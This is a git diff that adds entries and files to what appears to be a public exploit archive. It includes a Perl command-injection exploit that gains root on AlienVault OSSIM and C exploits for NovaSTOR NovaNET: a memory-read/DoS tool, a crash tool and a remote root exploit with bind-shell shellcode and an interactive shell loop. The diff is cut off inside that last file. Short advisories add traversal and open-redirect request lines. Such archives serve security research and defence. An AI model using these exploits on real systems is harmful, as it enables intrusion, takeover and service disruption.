diff --git a/files.csv b/files.csv
index 279e0eb07..f5dc3ef6c 100755
--- a/files.csv
+++ b/files.csv
@@ -30455,6 +30455,7 @@ id,file,description,date,author,platform,type,port
 33802,platforms/multiple/remote/33802.txt,"Jenkins Software RakNet 3.72 - Remote Integer Underflow Vulnerability",2010-03-25,"Luigi Auriemma",multiple,remote,0
 33803,platforms/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",hardware,webapps,0
 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
+33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0
 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
 33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
 33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
@@ -30490,6 +30491,7 @@ id,file,description,date,author,platform,type,port
 33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 ZIP File Remote Buffer Overflow Vulnerability",2010-04-19,lilf,windows,remote,0
 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service Vulnerability",2014-06-13,"A reliable source",windows,dos,0
 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 Memory Consumption Remote Denial of Service Vulnerability",2010-04-27,fallenpegasus,linux,dos,0
+33851,platforms/php/webapps/33851.txt,"Wordpress TimThumb 2.8.13 WebShot - Remote Code Execution (0-day)",2014-06-24,@u0x,php,webapps,0
 33852,platforms/windows/remote/33852.txt,"HTTP 1.1 GET Request Directory Traversal Vulnerability",2010-06-20,chr1x,windows,remote,0
 33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 'module' Parameter Cross Site Scripting Vulnerability",2010-04-19,anT!-Tr0J4n,php,webapps,0
 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module 'externalredirect.php' Cross-Site Scripting Vulnerability",2010-04-20,"Edgard Chammas",php,webapps,0
@@ -30502,3 +30504,14 @@ id,file,description,date,author,platform,type,port
 33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
 33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0
+33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0
+33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0
+33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0
+33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage 'RedirectUrl' Parameter URI Redirection Vulnerability",2010-04-25,"Aung Khant",multiple,remote,0
+33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 Multiple Security Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0
+33875,platforms/php/webapps/33875.txt,"HuronCMS 'index.php' Multiple SQL Injection Vulnerabilities",2010-03-30,mat,php,webapps,0
+33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 remote DoS and arbitrary memory read",2007-09-14,mu-b,multiple,dos,0
+33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET <= 12.0 remote root exploit",2007-09-25,mu-b,multiple,remote,0
+33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit",2007-09-25,mu-b,multiple,remote,0
+33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP <= 13.0 remote DoS",2007-10-02,mu-b,multiple,dos,0
+33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0
diff --git a/platforms/linux/remote/33805.pl b/platforms/linux/remote/33805.pl
new file mode 100755
index 000000000..3f5266ffc
--- /dev/null
+++ b/platforms/linux/remote/33805.pl
@@ -0,0 +1,29 @@
+# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution
+# Date: 06/17/2014
+# Exploit Author: Alfredo Ramirez
+# Vendor Homepage: http://www.alienvault.com/
+# Software Link: http://www.alienvault.com/open-threat-exchange/projects
+# Version: < 4.7.0
+# Tested on: Debian/Virtual Appliance
+# CVE : CVE-2014-3805
+
+ #!perl -w
+
+  use SOAP::Lite;
+
+  # SSL is self-signed so we have to ignore verification.
+  $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;
+
+  # We simply append the 'id' command to the number of log we want to
+  # read.
+  @soap_response = SOAP::Lite
+    -> uri('AV/CC/Util')
+    -> proxy('https://172.26.22.2:40007/av-centerd')
+    -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
+    -> result;
+
+  for (@{ $soap_response[0] }) {
+   print "$_\n";
+  }
+
+  # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)
diff --git a/platforms/multiple/dos/33876.c b/platforms/multiple/dos/33876.c
new file mode 100755
index 000000000..9d23e54b8
--- /dev/null
+++ b/platforms/multiple/dos/33876.c
@@ -0,0 +1,180 @@
+source: http://www.securityfocus.com/bid/39693/info
+
+NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities.
+
+An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer.
+
+NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability.
+
+/* novanet-read.c
+ *
+ * Copyright (c) 2007 by <mu-b@digit-labs.org>
+ *
+ * NovaSTOR NovaNET remote DoS + arbitrary memory read
+ * by mu-b - Fri Sep 14 2007
+ *
+ * - Tested on: NovaSTOR NovaNET 11.0
+ *
+ * Note: this was silently fixed in NovaBACKUP NETWORK 13.0
+ *
+ *    - Private Source Code -DO NOT DISTRIBUTE -
+ * http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+#include <string.h>
+#include <unistd.h>
+
+#define BUF_SIZE              0x92
+
+#define NOVANET_INT_IDX       32
+#define NOVANET_OFFSET        0x100EC480
+#define NOVANET_CALC_INT(a)   (((int) (a)-NOVANET_OFFSET-16)/sizeof (int))
+#define NOVANET_SET_INT(a,b)  *((unsigned int *) &a[NOVANET_INT_IDX]) = b;
+#define NOVANET_TCP_PORT      3817
+#define USLEEP_TIME           100000
+
+static int
+sock_send (int fd, char *src, int len)
+{
+  int n;
+  if ((n = send (fd, src, len, 0)) < 0)
+    {
+      perror ("send()");
+      exit (EXIT_FAILURE);
+    }
+
+  return (n);
+}
+
+static int
+sock_recv (int fd, char *dst, int len)
+{
+  return (recv (fd, dst, len, 0));
+}
+
+static int
+sockami (char *host, int port)
+{
+  struct sockaddr_in address;
+  struct hostent *hp;
+  int fd;
+
+  if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
+    {
+      perror ("socket()");
+      exit (EXIT_FAILURE);
+    }
+
+  if ((hp = gethostbyname (host)) == NULL)
+    {
+      perror ("gethostbyname()");
+      exit (EXIT_FAILURE);
+    }
+
+  memset (&address, 0, sizeof (address));
+  memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
+  address.sin_family = AF_INET;
+  address.sin_port = htons (port);
+
+  if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
+    {
+      perror ("connect()");
+      return (-1);
+    }
+
+  return (fd);
+}
+
+static void
+novanet_pkt_init (char *pkt)
+{
+  char *ptr = pkt;
+
+  /* add packet header */
+  *ptr++ = 0x54;
+  *ptr++ = 0x84;
+
+  /* add padding */
+  memset (ptr, 0x00, 0x1E);
+  ptr   += 0x1E;
+
+  /* add our dodgy-int */
+  memset (ptr, 0x69, sizeof (int));
+  ptr   += sizeof (int);
+
+  memset (ptr, 0x00, BUF_SIZE-(ptr-pkt));
+}
+
+static void
+novanet_read (char *host, void *start, void *end, int is_dos)
+{
+  int sock, i, num_hits;
+  char buf[BUF_SIZE], rbuf[BUF_SIZE];
+
+  novanet_pkt_init (buf);
+
+  start = (void *) NOVANET_CALC_INT (start);
+  end = (void *) NOVANET_CALC_INT (end);
+
+  if (!is_dos)
+    printf ("start: %p end: %p\n", start, end);
+
+  num_hits = is_dos ? 1 : (end - start);
+  printf ("+hitting %s:%d. (%d times)\n", host, NOVANET_TCP_PORT, num_hits);
+
+  for (i = 0; i < num_hits; i++, start++)
+    {
+      sock = sockami (host, NOVANET_TCP_PORT);
+      if (sock == -1)
+        break;
+
+      NOVANET_SET_INT (buf, (is_dos ? NOVANET_CALC_INT (0xdeadbeef) : (unsigned int) start));
+      sock_send (sock, buf, sizeof buf);
+
+      if (!is_dos)
+        {
+          sock_recv (sock, rbuf, sizeof rbuf);
+          write (fileno (stderr), &rbuf[NOVANET_INT_IDX], sizeof (int));
+          usleep (USLEEP_TIME);
+          close (sock);
+
+          if (!((i + 1) % 8))
+            printf ("..%d", i + 1);
+
+          fflush (stdout);
+        }
+    }
+
+  printf ("\n");
+}
+
+int
+main (int argc, char **argv)
+{
+  void *start, *end;
+
+  printf ("NovaSTOR NovaNET remote DoS + arbitrary memory read\n"
+          "by: <mu-b@digit-labs.org>\n"
+          "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
+
+  if ((argc % 2) == 1 ||
+      (argc > 3 && (sscanf (argv[2], "0x%p", &start) != 1 ||
+                    sscanf (argv[3], "0x%p", &end) != 1)))
+    {
+      fprintf (stderr, "Usage: %s <host> [[start] [end]]\n"
+                       "Note: not specifying [[start] [end]] results in DoS!\n\n", argv[0]);
+      exit (EXIT_SUCCESS);
+    }
+
+  if (argc > 3)
+    printf ("dumping from: %p -> %p (%d-bytes) to stderr\n", start, end, (int) (end - start));
+
+  novanet_read (argv[1], start, end, !(argc > 3));
+
+  return (EXIT_SUCCESS);
+}
diff --git a/platforms/multiple/dos/33879.c b/platforms/multiple/dos/33879.c
new file mode 100755
index 000000000..51110590f
--- /dev/null
+++ b/platforms/multiple/dos/33879.c
@@ -0,0 +1,191 @@
+source: http://www.securityfocus.com/bid/39693/info
+   
+NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities.
+   
+An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer.
+   
+NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability.
+
+/* novanet-dos.c
+ *
+ * Copyright (c) 2007 by <mu-b@digit-labs.org>
+ *
+ * NovaSTOR NovaNET/NovaBACKUP <= 13.0 remote DoS
+ * by mu-b - Tue Oct 2 2007
+ *
+ * - Tested on: NovaSTOR NovaNET 11.0(SP*)
+ *              NovaSTOR NovaNET 12.0(SP*)
+ *              NovaSTOR NovaNET 13.0
+ *
+ *    - Private Source Code -DO NOT DISTRIBUTE -
+ * http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <errno.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <string.h>
+#include <time.h>
+#include <unistd.h>
+
+#define NOVANET_HDR_SZ        0x14
+#define NOVANET_PKT_SZ        0x92
+#define NOVANET_MAX_LEN       0x112014
+
+#define NOVANET_TCP_PORT      3817
+#define USLEEP_TIME           100000
+
+static char hdr_pkt[] =
+  "\x54\x84\x00\x00"                            /* 04 */
+  "\x00\x00\x00\x00"                            /* 08 */
+  "\x04\x00\x00\x00"                            /* 0C */
+  "\x92\x00\x00\x00"                            /* 10 */
+  "\x00\x00\x00\x00"                            /* 14 */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 08 */  /* 1C */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 10 */  /* 24 */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 18 */  /* 2C */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 20 */  /* 34 */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 28 */  /* 3C */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 30 */  /* 44 */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 38 */  /* 4C */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 40 */  /* 54 */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 48 */  /* 5C */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 50 */  /* 64 */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 58 */  /* 6C */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 60 */  /* 74 */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 68 */  /* 7C */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 70 */  /* 84 */
+  "\x00\x00\x00\x00\x00\x00\x00\x00"  /* 78 */  /* 8C */
+  "\x00\x00\x00\x00\x00\x00";         /* 7E */  /* 92 */
+
+static char rem_pkt[] =
+  "\x51\x84\x00\x00"    /* 04 */
+  "\x00\x00\x00\x30"    /* 08 */
+  "\x05\x00\x00\x00"    /* 0C */
+  "\x00\x00\x00\x00"    /* 10 */
+  "\x00\x00\x00\x00";   /* 14 */
+
+static int
+sock_send (int fd, char *src, int len)
+{
+  int n;
+  if ((n = send (fd, src, len, 0)) < 0)
+    {
+      fprintf (stderr, "sock_send: send() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  return (n);
+}
+
+static int
+sock_recv (int fd, char *dst, int len)
+{
+  int n;
+  if ((n = recv (fd, dst, len, 0)) < 0)
+    {
+      fprintf (stderr, "sock_recv: recv() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  return (n);
+}
+
+static int
+sockami (char *host, int port)
+{
+  struct sockaddr_in address;
+  struct hostent *hp;
+  int fd;
+
+  if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
+    {
+      fprintf (stderr, "sockami: socket() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  if ((hp = gethostbyname (host)) == NULL)
+    {
+      fprintf (stderr, "sockami: gethostbyname() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  memset (&address, 0, sizeof (address));
+  memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
+  address.sin_family = AF_INET;
+  address.sin_port = htons (port);
+
+  if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
+    {
+      fprintf (stderr, "sockami: connect() - %s\n", strerror (errno));
+      return (-1);
+    }
+
+  return (fd);
+}
+
+int
+main (int argc, char **argv)
+{
+  char rbuf_pkt[NOVANET_PKT_SZ];
+  unsigned int rlen;
+  int fd, n;
+
+  printf ("NovaSTOR NovaNET remote DoS\n"
+          "by: <mu-b@digit-labs.org>\n"
+          "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
+
+  if (argc < 2)
+    {
+      fprintf (stderr, "Usage: %s <host>\n", argv[0]);
+      exit (EXIT_SUCCESS);
+    }
+
+  fd = sockami (argv[1], NOVANET_TCP_PORT);
+  if (fd == -1)
+    {
+      fprintf (stderr, "main: sockami failed\n");
+      exit (EXIT_FAILURE);
+    }
+
+  printf ("* connected to %s:%d\n", argv[1], NOVANET_TCP_PORT);
+
+  printf ("** sending header packet...");
+  if ((n = sock_send (fd, hdr_pkt, sizeof hdr_pkt - 1)) != NOVANET_PKT_SZ)
+    {
+      fprintf (stderr, "main: sock_send returned %d (!= %d)\n",
+               n, NOVANET_PKT_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  printf ("** reading first reply...");
+  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
+    {
+      fprintf (stderr, "main: sock_recv returned %d (!= %d)\n",
+               n, NOVANET_PKT_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  srand (time (NULL));
+  rlen = NOVANET_MAX_LEN + (rand () % (UINT_MAX - NOVANET_MAX_LEN)) + 1;
+  *(unsigned int *) &rem_pkt[12] = rlen;
+
+  printf ("** sending smash packet [remaining length %u-bytes]...", rlen);
+  if ((n = sock_send (fd, rem_pkt, sizeof rem_pkt - 1)) != NOVANET_HDR_SZ)
+    {
+      fprintf (stderr, "main: sock_send returned %d (!= %d)\n",
+               n, NOVANET_HDR_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  usleep (USLEEP_TIME);
+  close (fd);
+
+  return (EXIT_SUCCESS);
+}
diff --git a/platforms/multiple/remote/33868.txt b/platforms/multiple/remote/33868.txt
new file mode 100755
index 000000000..ce9cc8851
--- /dev/null
+++ b/platforms/multiple/remote/33868.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/39636/info
+
+Apache ActiveMQ is prone to a vulnerability that lets attackers access source code because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable computer in the context of the webserver process. Information obtained may aid in further attacks.
+
+Apache ActiveMQ 5.3.1 and prior are vulnerable.
+
+NOTE: This vulnerability may be related to BID 27117 (Jetty Double Slash URI Information Disclosure Vulnerability).
+
+http://www.example.com:8161//admin/index.jsp
+http://www.example.com:8161//admin/queues.jsp
+http://www.example.com:8161//admin/topics.jsp 
diff --git a/platforms/multiple/remote/33871.txt b/platforms/multiple/remote/33871.txt
new file mode 100755
index 000000000..2691298ab
--- /dev/null
+++ b/platforms/multiple/remote/33871.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39666/info
+
+Tiny Java Web Server is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include a directory-traversal vulnerability, an open-redirection vulnerability, and a source code information-disclosure vulnerability.
+
+Exploiting these issues can allow an attacker to retrieve arbitrary local files and view directories within the context of the webserver. Information harvested may aid in launching further attacks. A successful exploit may aid in phishing attacks; other attacks may also be possible.
+
+Tiny Java Web Server 1.71 is vulnerable; other versions may also be affected. 
+
+get /%00 HTTP/1.1\r\nHost: digitalwhisper.co.il<http://digitalwhisper.co.il>\r\n\r\n
+GET /demo-servlets/%2fWEB-INF/config/mishka.properties HTTP/1.1 
\ No newline at end of file
diff --git a/platforms/multiple/remote/33873.txt b/platforms/multiple/remote/33873.txt
new file mode 100755
index 000000000..8fecebd71
--- /dev/null
+++ b/platforms/multiple/remote/33873.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/39676/info
+
+HP System Management Homepage is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+http://www.example.com/red2301.html?RedirectUrl=evil () attacker com 
\ No newline at end of file
diff --git a/platforms/multiple/remote/33877.c b/platforms/multiple/remote/33877.c
new file mode 100755
index 000000000..1f079c0b6
--- /dev/null
+++ b/platforms/multiple/remote/33877.c
@@ -0,0 +1,386 @@
+source: http://www.securityfocus.com/bid/39693/info
+ 
+NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities.
+ 
+An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer.
+ 
+NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability.
+
+/* novanet-own-lnx.c
+ *
+ * Copyright (c) 2007 by <mu-b@digit-labs.org>
+ *
+ * NovaSTOR NovaNET <= 12.0 remote root exploit
+ * by mu-b - Tue Sep 25 2007
+ *
+ * - Tested on: NovaSTOR NovaNET 11.0 (lnx)
+ *
+ * Note: this was silently fixed in NovaBACKUP NETWORK 13.0
+ *
+ *    - Private Source Code -DO NOT DISTRIBUTE -
+ * http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <errno.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <string.h>
+#include <unistd.h>
+
+#define NOVANET_POPRET        0x8048eea   /* pop %exx
+                                           * ret
+                                           */
+
+/* packet structure defines */
+#define NOVANET_HDR_SZ        0x14
+#define NOVANET_PKT_SZ        0x92
+#define NOVANET_DOMAIN_SZ     0x1F
+#define NOVANET_BUF_SZ        0x400
+
+#define PORT_SHELL            10000
+#define NOVANET_TCP_PORT      3817
+#define USLEEP_TIME           100000
+
+static char getdomain_buf[] =
+  "\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00"
+  "\xff\xff\xff\xff\x08\x40\x80\x00\x16\xaa\x11\x02\x4c\x84\xf4\x01"
+  "\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00" "digit-labs!$"
+  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00" "Sup: Get Domain Address"
+  "\x00\x00\xff\xff\x00\x00\x06\x10";
+
+static char ack_buf[] =
+  "\x51\x84\x00\x00\x00\x00\x00\x30"
+  "\x05\x00\x00\x00"
+  "\x18\x00\x00\x00"  /* remaining length */
+  "\x00\x00\x00\x00"
+  "\x01\x00\x00\x00";
+
+static char hup_buf[] =
+  "\x56\x84\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00"
+  "\x14\x00\x00\x00"  /* remaining length */
+  "\x00\x00\x00\x00";
+
+static char login_buf[] =
+  "\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00"
+  "\xff\xff\xff\xff\x09\x20\x80\x00\xcb\x14\x4C\x02\x41\xda\x2e\x02"
+  "\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
+  "\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
+  "\x69\x69\x69" "Dtb: Context"
+  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\xff\xff\x00\x00\x00\x00";
+
+static char rem_buf[] =
+  "\x51\x84\x00\x00\x02\x02\x02\x32"
+  "\x18\x00\x00\x00"
+  "\x00\x00\x00\x00"  /* remaining length */
+  "\x00\x00\x00\x00";
+
+static char lnx_x86_bind[] =
+  "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x12"
+  "\x76\xfc\x7d\x83\xeb\xfc\xe2\xf4\x23\xad\xaf\x3e\x41\x1c\xfe\x17"
+  "\x74\x2e\x65\xf4\xf3\xbb\x7c\xeb\x51\x24\x9a\x15\x35\x66\x9a\x2e"
+  "\x9b\x97\x96\x1b\x4a\x26\xad\x2b\x9b\x97\x31\xfd\xa2\x10\x2d\x9e"
+  "\xdf\xf6\xae\x2f\x44\x35\x75\x9c\xa2\x10\x31\xfd\x81\x1c\xfe\x24"
+  "\xa2\x49\x31\xfd\x5b\x0f\x05\xcd\x19\x24\x94\x52\x3d\x05\x94\x15"
+  "\x3d\x14\x95\x13\x9b\x95\xae\x2e\x9b\x97\x31\xfd";
+
+static int
+sock_send (int fd, char *src, int len)
+{
+  int n;
+  if ((n = send (fd, src, len, 0)) < 0)
+    {
+      fprintf (stderr, "sock_send: send() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  return (n);
+}
+
+static int
+sock_recv (int fd, char *dst, int len)
+{
+  int n;
+  if ((n = recv (fd, dst, len, 0)) < 0)
+    {
+      fprintf (stderr, "sock_recv: recv() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  return (n);
+}
+
+static void
+shellami (int fd)
+{
+  int n;
+  fd_set rset;
+  char rbuf[1024], *cmd = "id; uname -a; uptime\n";
+
+  sock_send (fd, cmd, strlen (cmd));
+
+  while (1)
+    {
+      FD_ZERO (&rset);
+      FD_SET (fd, &rset);
+      FD_SET (STDIN_FILENO, &rset);
+
+      if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
+        {
+          fprintf (stderr, "shellami: select() - %s\n", strerror (errno));
+          exit (EXIT_FAILURE);
+        }
+
+      if (FD_ISSET (fd, &rset))
+        {
+          if ((n = sock_recv (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
+            {
+              fprintf (stderr, "shellami: connection closed by foreign host.\n");
+              exit (EXIT_SUCCESS);
+            }
+          rbuf[n] = '\0';
+          printf ("%s", rbuf);
+          fflush (stdout);
+        }
+      if (FD_ISSET (STDIN_FILENO, &rset))
+        {
+          if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
+            {
+              rbuf[n] = '\0';
+              sock_send (fd, rbuf, n);
+            }
+        }
+    }
+}
+
+static int
+sockami (char *host, int port)
+{
+  struct sockaddr_in address;
+  struct hostent *hp;
+  int fd;
+
+  if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
+    {
+      fprintf (stderr, "sockami: socket() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  if ((hp = gethostbyname (host)) == NULL)
+    {
+      fprintf (stderr, "sockami: gethostbyname() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  memset (&address, 0, sizeof (address));
+  memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
+  address.sin_family = AF_INET;
+  address.sin_port = htons (port);
+
+  if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
+    {
+      fprintf (stderr, "sockami: connect() - %s\n", strerror (errno));
+      return (-1);
+    }
+
+  return (fd);
+}
+
+static void
+novanet_get_domain (char *thost, char *d_name)
+{
+  char rbuf_hdr[NOVANET_HDR_SZ], rbuf_pkt[NOVANET_PKT_SZ], *pkt_ptr;
+  int fd, n, rlen;
+
+  fd = sockami (thost, NOVANET_TCP_PORT);
+  if (fd == -1)
+    {
+      fprintf (stderr, "novanet_get_domain: sockami failed\n");
+      exit (EXIT_FAILURE);
+    }
+
+  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
+
+  printf ("** sending getdomain_buf packet...");
+  if ((n = sock_send (fd, getdomain_buf, sizeof getdomain_buf - 1)) != NOVANET_PKT_SZ)
+    {
+      fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n",
+               n, NOVANET_PKT_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  printf ("** reading first reply...");
+  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
+    {
+      fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
+               n, NOVANET_PKT_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  memcpy (d_name, &rbuf_pkt[0x54], NOVANET_DOMAIN_SZ);
+  printf ("** remote domain address: %.*s\n", NOVANET_DOMAIN_SZ, d_name);
+
+  printf ("** sending ack packet...");
+  if ((n = sock_send (fd, ack_buf, sizeof ack_buf - 1)) != NOVANET_HDR_SZ + 4)
+    {
+      fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n",
+               n, NOVANET_HDR_SZ + 4);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  printf ("** reading second reply...");
+  if ((n = sock_recv (fd, rbuf_hdr, sizeof rbuf_hdr)) != NOVANET_HDR_SZ)
+    {
+      fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
+               n, NOVANET_HDR_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  rlen  = *(unsigned int *) &rbuf_hdr[12];
+  if (rlen < NOVANET_HDR_SZ)
+    {
+      fprintf (stderr, "novanet_get_domain: remaining length invalid (<%d)\n",
+               NOVANET_HDR_SZ);
+      exit (EXIT_FAILURE);
+    }
+
+  rlen -= NOVANET_HDR_SZ;
+  printf ("** reading %d-remaining bytes...", rlen);
+  pkt_ptr = malloc (rlen * sizeof (char));
+
+  if ((n = sock_recv (fd, pkt_ptr, rlen)) != rlen)
+    {
+      fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
+               n, rlen);
+      exit (EXIT_FAILURE);
